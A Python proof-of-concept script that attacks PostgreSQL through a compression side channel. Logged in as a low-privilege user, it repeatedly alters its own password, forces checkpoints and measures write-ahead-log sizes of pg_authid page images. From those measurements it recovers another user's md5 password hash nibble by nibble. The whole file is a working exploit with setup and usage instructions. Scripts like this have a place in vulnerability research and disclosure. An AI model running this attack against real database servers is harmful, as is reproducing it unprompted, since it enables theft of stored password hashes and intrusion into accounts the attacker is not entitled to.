#!/usr/bin/python3
#
# Prerequisites:
# Create a user called "eve". The script logs in as that user, and changes
# its password repeatedly. You also need to create a dummy table called
# "garbage", which is used by the script to create some dummy WAL activity.
#
# CREATE USER eve;
# CREATE TABLE garbage (t text);
# ALTER TABLE garbage OWNER To eve;
# 
#
# Usage:
# Edit the connection string below. Launch the script. It will run
# for a long time, printing out a line after each guess (after each
# checkpoint).
#
# If you want to make the script run faster, you can cheat and grant eve
# superuser privileges, and modify the perform_checkpoint function below
# to use a direct CHECKPOINT command, instead of forcing a checkpoint with
# write activity.
#
# Caveats:
# There are a lot of things that could confuse the script and stall it:
# * Concurrent update of pg_authid table
# * Other concurrent WAL activity
# * More than one other user on the same pg_authid page (or even a dead row)
#
import psycopg2;
import statistics;

# libpq connection string for the attacking "eve" account; edit as needed.
connectstr = "host=localhost dbname=postgres user=eve"

# Characters used to pad guesses. The string must not repeat and must not
# contain hex characters (0-9, a-f), so that the padding avoids compression.
# NOTE(review): 'W' and 'w' are absent from this alphabet. That is harmless,
# since the string is still non-repeating and hex-free, but possibly
# unintentional.
paddingstr = "ABCDEFGHIJKLMNOPQRSTUVXYZghijklmnopqrstuvxyz"

# Known prefix of the victim's stored password. If you already know the
# first N characters, put them here.
initial_guess = "md5"

# Length of the string being recovered: "md5" followed by 32 hex digits.
victim_length = len("md5") + 32

# Number of measurements taken per guess. Raising it makes the attack slower
# but less likely to be confused by small random differences in WAL record
# sizes.
num_repeats = 5

# Running count of checkpoints performed so far (incremented by
# perform_checkpoint()).
checkpoints = 0

def perform_checkpoint(use_checkpoint_command=False):
    """Force a checkpoint and increment the global ``checkpoints`` counter.

    A plain CHECKPOINT command is superuser-only. By default this function
    therefore generates dummy write activity on the "garbage" table until a
    checkpoint is observed.

    There is no direct way to detect that a checkpoint has happened, so WAL
    compression is used as the signal:
    - Each iteration inserts a ~1 kB row that compresses well.
    - Normally the WAL record for that row takes somewhat over 1000 bytes.
    - Just after a checkpoint, a full-page image is taken. With full-page
      compression enabled, that record compresses to well under 1000 bytes.
    The first such small record ends the loop.

    Args:
        use_checkpoint_command: If true, issue a direct CHECKPOINT instead.
            This requires superuser privileges (you can cheat by granting
            them to eve), but makes the script run *much* faster.
    """
    global checkpoints
    checkpoints += 1

    if use_checkpoint_command:
        c.execute("CHECKPOINT")
        return

    # VACUUM cannot run inside a transaction block. End the current
    # transaction and switch to autocommit just for this statement.
    # NOTE(review): presumably this vacuum lets the rolled-back dummy rows'
    # space be reused; confirm.
    conn.rollback()
    conn.autocommit = True
    c.execute("vacuum garbage")
    conn.autocommit = False

    c.execute("SELECT pg_current_xlog_insert_location();")
    beforexlog = c.fetchone()[0]
    for _ in range(100000):
        c.execute("INSERT INTO garbage VALUES (repeat('x', 1000))")
        # In one round trip, read the new insert position and the amount of
        # WAL written since the previous measurement.
        c.execute(
            "SELECT pg_current_xlog_insert_location(), "
            "pg_current_xlog_insert_location() - %s;",
            [beforexlog],
        )
        beforexlog, diff = c.fetchone()
        # The dummy row is never kept.
        conn.rollback()

        if diff < 1000:
            return

    # Previously this fell through silently, leaving later measurements
    # taken without a fresh checkpoint.
    print("Warning: no checkpoint detected after 100000 inserts; "
          "measurements may be unreliable.")

def switch_xlog_page():
    """Burn WAL with throwaway inserts until the insert position is early in a page.

    There is a lot of slack here. It is enough that the insert position lies
    within the first 1000 bytes of a WAL page, so the upcoming full-page-image
    record of the ALTER USER command won't cross the page boundary and mess
    with the measurements. The query assumes 8192-byte WAL pages.
    """
    offset_query = "select (pg_current_xlog_insert_location() - '0/0') % 8192"

    def offset_in_page():
        c.execute(offset_query)
        return c.fetchone()[0]

    while offset_in_page() >= 1000:
        # Each rolled-back single-row insert advances the insert position.
        c.execute("INSERT INTO garbage VALUES ('x')")
        conn.rollback()

def guess_password(guess):
    """Set eve's password to *guess*, measure the WAL it generates, then roll back.

    The password is given UNENCRYPTED, so the guess text itself is what gets
    stored in the updated row. How well that row compresses is what the
    attack measures.

    Returns:
        The number of WAL bytes between the insert positions read before and
        after the ALTER USER statement.
    """
    c.execute("SELECT pg_current_xlog_insert_location();")
    (start,) = c.fetchone()
    c.execute("ALTER USER eve UNENCRYPTED PASSWORD %s", [guess])
    c.execute("SELECT pg_current_xlog_insert_location() - %s;", [start])
    (wal_bytes,) = c.fetchone()
    conn.rollback()
    return wal_bytes

def prune():
    """Change the password repeatedly until the page gets pruned.

    This gives a clean slate for the next attempt. A single password change
    producing more than 200 bytes of WAL is taken as the sign that pruning
    happened.
    """
    wal_bytes = guess_password('x')
    while wal_bytes <= 200:
        wal_bytes = guess_password('x')

def checkpoint_and_guess(pw):
    """Measure the WAL size of one password change under controlled conditions.

    Steps:
    - Prune the page (twice).
    - Force a checkpoint, so the next change carries a full-page image.
    - Move the WAL insert position near the start of a page.
    - Return guess_password(pw).
    """
    for _ in range(2):
        prune()
    perform_checkpoint()
    switch_xlog_page()
    return guess_password(pw)

def construct_guess(known, nibble, padding):
    """Build the password to try for the nibble following *known*.

    Args:
        known: The hash prefix recovered so far.
        nibble: Candidate value 0-15 for the next nibble, or -1 for a
            placeholder 'X', which is not a hex digit.
        padding: How many characters of paddingstr to append.

    Returns:
        The last four characters of "md5" + known + candidate, followed by
        the padding.
    """
    candidate = 'X' if nibble == -1 else hex(nibble)[2:]

    # Keep only the last 4 characters. The compression algorithm doesn't find
    # common strings shorter than 4 bytes, so capping the match at 4 bytes
    # gives the maximum difference between a correct and an incorrect guess.
    # A correct guess compresses to a short back-reference, while an
    # incorrect guess is stored uncompressed as 4 bytes.
    # The downside is that repeating 4-byte patterns in the victim hash can
    # confuse the attack. To make it more robust, longer strings could be
    # tried when this method fails.
    probe = ("md5" + known + candidate)[-4:]
    return probe + paddingstr[:padding]

def _stable_guess_length(pw):
    """Return checkpoint_and_guess(pw), repeated until two consecutive runs agree."""
    while True:
        len1 = checkpoint_and_guess(pw)
        print("padding guess: %s - %d" % (pw, len1))
        len2 = checkpoint_and_guess(pw)
        print("padding guess: %s - %d" % (pw, len2))
        if len1 == len2:
            return len1


def find_padding(known, begin):
    """Find a useful amount of padding to use for the next guess.

    Why padding matters:
    - The guess is padded with N uncompressible characters, so that the WAL
      record size of the full-page image sits just on the edge of an
      alignment boundary.
    - If the next nibble is then guessed correctly and the image compresses
      one byte better than usual, the aligned WAL record also becomes
      smaller.
    - Without this, the saving would be masked by the record's alignment
      padding.

    How the search works:
    - Padding values are scanned from *begin* upward, using a deliberately
      wrong guess (placeholder 'X').
    - The function returns the first padding at which the measured record
      size differs from the size at the previous padding.
    - When the end of paddingstr is reached, the scan restarts from 0. It
      keeps going until such a step is found.

    Args:
        known: The hash prefix recovered so far.
        begin: The padding value to start scanning from.

    Returns:
        A padding value strictly greater than the first value of the scan
        that found it.
    """
    start = begin
    while True:
        # Loop instead of recursing on wrap-around, so a long run without
        # progress cannot exhaust the interpreter's recursion limit.
        prev_len = None
        for padding in range(start, len(paddingstr)):
            cur_len = _stable_guess_length(construct_guess(known, -1, padding))
            if prev_len is not None and cur_len != prev_len:
                return padding
            prev_len = cur_len
        print("Wrapped around padding. Looks like we're not making progress...")
        start = 0

def guess_set(known, padding):
    """Try to guess the next nibble, using *padding* characters of padding.

    Measurement:
    - Each of the 16 candidate nibbles is measured num_repeats times with
      checkpoint_and_guess().
    - Measurements under 200 bytes are retried, since such small values are
      not believable (there was probably no full-page image).

    Decision:
    - Each candidate's average is compared with the median of all individual
      measurements.
    - If the smallest average is more than 5 bytes below that median, that
      candidate is taken as the correct nibble.
    - Otherwise none of the nibbles looks better than the others, and the
      caller has to try something else.

    Args:
        known: The hash prefix recovered so far.
        padding: Number of padding characters appended to each guess.

    Returns:
        The best nibble as an int in 0..15, or None if no candidate stood out.
    """
    sizes = []     # every individual measurement, used for the median
    averages = []  # mean WAL size per candidate, indexed by nibble value

    for nibble in range(16):
        # The guess string is the same for every repeat of this nibble.
        pw = construct_guess(known, nibble, padding)
        total = 0
        for _ in range(num_repeats):
            wal_len = checkpoint_and_guess(pw)
            # Very small values probably mean no full-page image; re-measure.
            while wal_len < 200:
                wal_len = checkpoint_and_guess(pw)
            sizes.append(wal_len)
            print('{0:s}: WAL size {1}'.format(pw, wal_len))
            total += wal_len
        averages.append(total / num_repeats)

    len_median = statistics.median(sizes)
    print("median: " + str(len_median))
    for i, avg in enumerate(averages):
        print("diff %s%s: %d" % (known, hex(i)[2:], avg - len_median))

    # min() returns the first of equal minima, like the original strict '<' scan.
    best_guess = min(range(16), key=averages.__getitem__)
    if averages[best_guess] < len_median - 5:
        return best_guess
    return None

def guess_next_nibble(known):
    """Try to guess the nibble of the hash that follows *known*.

    Alternates between find_padding() and guess_set() until guess_set()
    reports a nibble that clearly stands out. Each retry resumes the padding
    search from the padding used in the previous attempt.

    Returns:
        The recovered nibble as a single lowercase hex character.
    """
    padding = 0
    while True:
        padding = find_padding(known, padding)
        print("Attempting to guess next nibble with padding {0}".format(padding))
        best = guess_set(known, padding)
        if best is not None:
            return hex(best)[2:]
        # This guess gave no new information; try again with a different
        # amount of padding on the next iteration.


# MAIN: connect as eve, then recover the hash one nibble at a time.
conn = psycopg2.connect(connectstr)
c = conn.cursor()  # module-level cursor used by the helper functions above

print("Connected\n")

known = initial_guess
while len(known) < victim_length:
    known += guess_next_nibble(known)
    print('Got next nibble. Known so far: {0} ({1} checkpoints)'.format(
        known, checkpoints))
